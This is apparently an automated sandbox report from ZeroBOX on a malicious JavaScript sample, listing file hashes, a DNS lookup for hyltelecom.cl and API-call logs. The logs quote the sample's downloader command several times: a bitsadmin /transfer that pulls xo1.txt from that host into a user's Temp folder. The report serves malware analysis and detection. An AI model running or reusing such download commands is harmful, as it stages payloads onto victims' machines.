popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

jRuiQlItEQ.JS

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 April 12, 2023, 11:35 a.m. April 12, 2023, 11:37 a.m.
Size 97.0KB
Type UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5 6c5a8e4d9ba2f4ccb0ae3444473b3353
SHA256 07686c57e4a71462dbb2a91377c2ee7cd22a2f11c66c78188f8ccbff6fad78fd
CRC32 CEE62B8D
ssdeep 192:BgFqgFqgFqgFqgFqgFqgFqgFqgFqgFqgFqgF0mmmmmmmmmmm6gFqgFqgFqgFqgFa:Keqsv
Yara None matched

Name Response Post-Analysis Lookup
hyltelecom.cl
A 51.161.7.156
51.161.7.156
IP Address Status Action
164.124.101.2 Active Moloch
51.161.7.156 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: BITSADMIN version 3.0 [ 7.5.7601 ]
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: BITS administration utility.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: (C) Copyright 2000-2006 Microsoft Corp.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: DISPLAY: '
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: TYPE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: DOWNLOAD
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: STATE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: CONNECTING
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: PRIORITY:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: NORMAL
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: FILES:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: BYTES:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 0 / UNKNOWN
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: TRANSFER RATE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 0.00 B/S
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: DISPLAY: '
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: TYPE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: DOWNLOAD
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: STATE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: TRANSIENT_ERROR
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: PRIORITY:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: NORMAL
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: FILES:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: BYTES:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 0 / UNKNOWN
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR FILE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: https://hyltelecom.cl/xo1.txt -> C:\Users\test22\AppData\Local\T
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR CODE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 0x80072ee2 - 작업 시간을 초과했습니다.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR CONTEXT:
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 0x00000005 - 원격 파일을 처리하는 동안 오류가 발생했습니다.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: bitsadmin
parameters: /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
filepath: bitsadmin
1 1 0
parent_process wscript.exe martian_process "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
parent_process wscript.exe martian_process bitsadmin /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
cmdline "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
cmdline bitsadmin /transfer 8 https://hyltelecom.cl/xo1.txt C:\Users\test22\AppData\Local\TempVB
dead_host 51.161.7.156:443
file C:\Windows\System32\bitsadmin.exe